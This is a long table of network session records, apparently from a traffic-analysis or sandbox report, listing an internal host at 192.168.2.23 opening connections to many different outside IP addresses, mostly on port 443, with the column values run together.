                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25955192.168.2.2335114164.145.108.24443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25956192.168.2.2355080110.208.244.202443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25957192.168.2.23422068.10.169.12443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25958192.168.2.236058695.122.72.113443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25959192.168.2.2349424194.199.175.207443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25960192.168.2.2349558192.150.160.212443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25961192.168.2.234161470.155.165.125443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25962192.168.2.235894698.66.243.166443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25963192.168.2.2360758217.94.108.50443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25964192.168.2.2333130197.89.53.21443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25965192.168.2.2360858210.93.19.15443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25966192.168.2.2355038157.140.137.214443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25967192.168.2.2350942130.202.240.148443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25968192.168.2.235163034.136.7.148443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25969192.168.2.235454295.120.23.178443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25970192.168.2.233530687.62.42.102443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25971192.168.2.23407862.197.111.199443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25972192.168.2.2336710139.218.100.25443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25973192.168.2.2333814211.104.51.242443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25974192.168.2.233585289.80.59.155443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25975192.168.2.2359570142.72.22.67443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25976192.168.2.2333846222.210.6.245443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25977192.168.2.2352430192.152.126.200443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25978192.168.2.233795443.21.188.72443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25979192.168.2.2348390119.197.153.162443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25980192.168.2.2346658136.63.136.252443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25981192.168.2.2339894195.194.141.225443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25982192.168.2.2355550133.165.229.163443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25983192.168.2.234647879.82.84.57443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25984192.168.2.2334802130.77.41.204443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25985192.168.2.234165087.46.174.225443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25986192.168.2.235903060.105.63.85443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25987192.168.2.2336188179.10.15.33443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25988192.168.2.2357086149.114.30.77443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25989192.168.2.2341024213.150.67.36443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25990192.168.2.2347732137.5.82.99443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25991192.168.2.2340982149.130.124.208443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25992192.168.2.2350432218.167.11.204443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25993192.168.2.234134687.239.39.154443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25994192.168.2.2358402149.86.145.0443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25995192.168.2.2360738150.120.17.11443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25996192.168.2.2337082139.40.173.241443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25997192.168.2.235928472.157.173.31443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25998192.168.2.233545675.104.160.214443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25999192.168.2.234988252.113.181.58443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26000192.168.2.23453385.30.186.213443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26001192.168.2.2355976181.236.127.204443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26002192.168.2.2334052140.97.208.23443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26003192.168.2.2355960100.249.177.233443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26004192.168.2.2358066152.210.250.249443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26005192.168.2.235026484.236.20.233443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26006192.168.2.2335342188.9.65.105443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26007192.168.2.2345356130.190.90.69443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26008192.168.2.2347402179.217.237.28443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26009192.168.2.2336954129.23.176.98443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26010192.168.2.2338992156.21.167.18443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26011192.168.2.2353892219.5.116.114443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26012192.168.2.2360420210.50.80.211443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26013192.168.2.234770237.208.16.178443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26014192.168.2.234355040.239.91.39443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26015192.168.2.2347608105.206.111.229443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26016192.168.2.2344488126.188.80.236443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26017192.168.2.233990658.199.163.180443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26018192.168.2.234923817.76.106.135443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26019192.168.2.234392425.254.207.10443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26020192.168.2.2342216102.27.70.152443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26021192.168.2.2347794203.52.44.33443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26022192.168.2.235677298.241.58.74443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26023192.168.2.236097627.8.161.106443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26024192.168.2.2350574199.46.171.178443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26025192.168.2.2359258129.47.122.180443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26026192.168.2.2347562209.4.166.90443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26027192.168.2.2343794181.111.5.212443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26028192.168.2.2345144116.129.136.230443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26029192.168.2.233436820.162.106.70443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26030192.168.2.234898431.238.11.176443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26031192.168.2.233993438.215.149.235443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26032192.168.2.234402695.222.226.15443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26033192.168.2.236078262.145.145.113443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26034192.168.2.2335636131.218.20.242443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26035192.168.2.235253834.168.71.90443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26036192.168.2.235133881.2.70.10443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26037192.168.2.2354860106.185.52.40443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26038192.168.2.23418465.86.182.14443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26039192.168.2.2336564185.35.63.98443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26040192.168.2.2357340160.172.103.127443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26041192.168.2.2354080182.172.70.55443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26042192.168.2.2356358165.172.184.15443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26043192.168.2.235541239.181.244.74443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26044192.168.2.2339512187.32.156.55443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26045192.168.2.2342580102.222.112.181443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26046192.168.2.2357182154.1.120.71443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26047192.168.2.2347934207.17.181.157443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26048192.168.2.235707897.105.62.48443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26049192.168.2.234630438.17.231.42443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26050192.168.2.23428241.101.136.154443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26051192.168.2.2358868161.220.14.119443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26052192.168.2.2351924123.133.146.216443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26053192.168.2.233351684.74.62.73443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26054192.168.2.234388895.53.159.63443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26055192.168.2.2336138115.183.3.238443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26056192.168.2.2335588153.191.233.119443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26057192.168.2.2337080149.244.49.46443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26058192.168.2.2360212174.186.89.112443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26059192.168.2.234223836.84.235.129443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26060192.168.2.2348448134.163.77.182443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26061192.168.2.2340822159.246.143.247443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26062192.168.2.2359146222.123.229.240443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26063192.168.2.2342718142.158.36.244443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26064192.168.2.233865632.59.25.88443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26065192.168.2.235001448.194.224.238443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26066192.168.2.233366848.165.229.160443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26067192.168.2.2343334117.182.249.113443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26068192.168.2.2345606129.169.60.22443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26069192.168.2.2333986207.190.167.102443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26070192.168.2.23552809.0.229.185443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26071192.168.2.233679836.168.205.134443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26072192.168.2.2334298140.194.191.107443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26073192.168.2.2358988206.207.130.95443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26074192.168.2.234947278.170.253.230443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26075192.168.2.235582260.26.159.202443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26076192.168.2.2360614105.130.122.5443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26077192.168.2.234376495.178.119.227443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26078192.168.2.2339916152.35.128.238443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26079192.168.2.2353564158.96.193.75443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26080192.168.2.2346916207.146.218.140443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26081192.168.2.234341852.146.61.29443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26082192.168.2.234714474.243.19.90443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26083192.168.2.235352060.6.96.119443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26084192.168.2.2345480154.206.136.718080
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26085192.168.2.233999879.254.59.51443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26086192.168.2.2340206141.176.25.237443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26087192.168.2.233432678.86.215.17443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26088192.168.2.2358978205.34.109.129443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26089192.168.2.2356144109.207.89.28443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26090192.168.2.2343684170.18.177.160443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26091192.168.2.2341682125.12.102.77443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26092192.168.2.2359096189.18.143.87443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26093192.168.2.2346096138.201.253.138443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26094192.168.2.235829235.183.193.245443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26095192.168.2.235449439.36.223.222443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26096192.168.2.2356874174.158.184.113443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26097192.168.2.235303466.195.25.169443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26098192.168.2.2345992128.5.65.33443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26099192.168.2.2358276125.155.77.18443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26100192.168.2.2351102164.116.138.249443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26101192.168.2.235481831.38.240.46443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26102192.168.2.2353688181.106.174.69443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26103192.168.2.233809495.99.68.99443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26104192.168.2.2347490186.163.183.68443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26105192.168.2.2359432144.28.9.129443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26106192.168.2.2351864141.152.87.110443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26107192.168.2.2341710155.74.221.54443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26108192.168.2.23445828.106.44.6443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26109192.168.2.234297834.60.6.62443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26110192.168.2.2345028153.161.175.44443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26111192.168.2.2353468144.167.46.94443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26112192.168.2.235516227.83.8.169443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26113192.168.2.233485099.243.198.47443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26114192.168.2.2358524166.88.102.99443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26115192.168.2.235746814.45.218.62443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26116192.168.2.234454457.229.51.138443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26117192.168.2.2346456106.247.80.222443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26118192.168.2.2348578182.247.98.97443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26119192.168.2.2360990105.30.227.88443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26120192.168.2.2359128206.93.49.226443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26121192.168.2.2353398189.247.124.31443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26122192.168.2.2354336104.188.24.163443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26123192.168.2.235266286.95.92.77443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26124192.168.2.2334386138.165.86.157443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26125192.168.2.235895238.116.239.57443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26126192.168.2.2348452210.0.46.89443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26127192.168.2.2335842174.182.236.55443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26128192.168.2.235793434.77.10.142443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26129192.168.2.234334418.84.36.215443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26130192.168.2.235780213.190.241.162443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26131192.168.2.234883460.134.50.15443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26132192.168.2.2335990138.87.110.8443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26133192.168.2.234715245.232.193.60443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26134192.168.2.235176244.200.33.0443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26135192.168.2.235227827.41.108.88443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26136192.168.2.2340138210.158.138.1443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26137192.168.2.234746443.197.161.210443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26138192.168.2.2347586142.128.87.5443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26139192.168.2.2332788193.183.67.89443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26140192.168.2.2341170223.25.175.112443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26141192.168.2.2348508168.94.63.44443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26142192.168.2.2345572150.72.140.32443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26143192.168.2.2359570180.152.131.191443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26144192.168.2.234040627.249.117.17443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26145192.168.2.2360088203.82.10.33443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26146192.168.2.234592672.111.33.169443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26147192.168.2.2340162136.197.88.186443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26148192.168.2.233789445.94.15.24443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26149192.168.2.2333314159.247.144.23443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26150192.168.2.2337184111.189.25.126443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26151192.168.2.2353116136.26.141.193443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26152192.168.2.2342742168.169.137.176443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26153192.168.2.2346154130.132.189.10443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26154192.168.2.2360616112.79.201.69443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26155192.168.2.235191095.202.182.238443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26156192.168.2.2345186200.81.210.199443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26157192.168.2.2349550206.179.166.243443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26158192.168.2.2343568152.157.142.237443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26159192.168.2.234550257.133.148.83443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26160192.168.2.2353782189.122.70.61443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26161192.168.2.233738037.88.84.76443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26162192.168.2.2353184181.26.214.125443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26163192.168.2.233466232.18.139.162443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26164192.168.2.236031264.241.88.238443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26165192.168.2.2339580161.225.201.83443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26166192.168.2.234622080.108.134.169443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26167192.168.2.2349602113.161.60.6443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26168192.168.2.234284881.9.170.246443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26169192.168.2.235881231.40.223.43443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26170192.168.2.235065241.96.79.2443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26171192.168.2.2334360131.83.226.65443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26172192.168.2.2338596146.138.117.151443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26173192.168.2.233514693.92.46.47443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26174192.168.2.233848689.16.192.215443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26175192.168.2.2354490129.189.149.205443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26176192.168.2.2354188125.200.117.53443
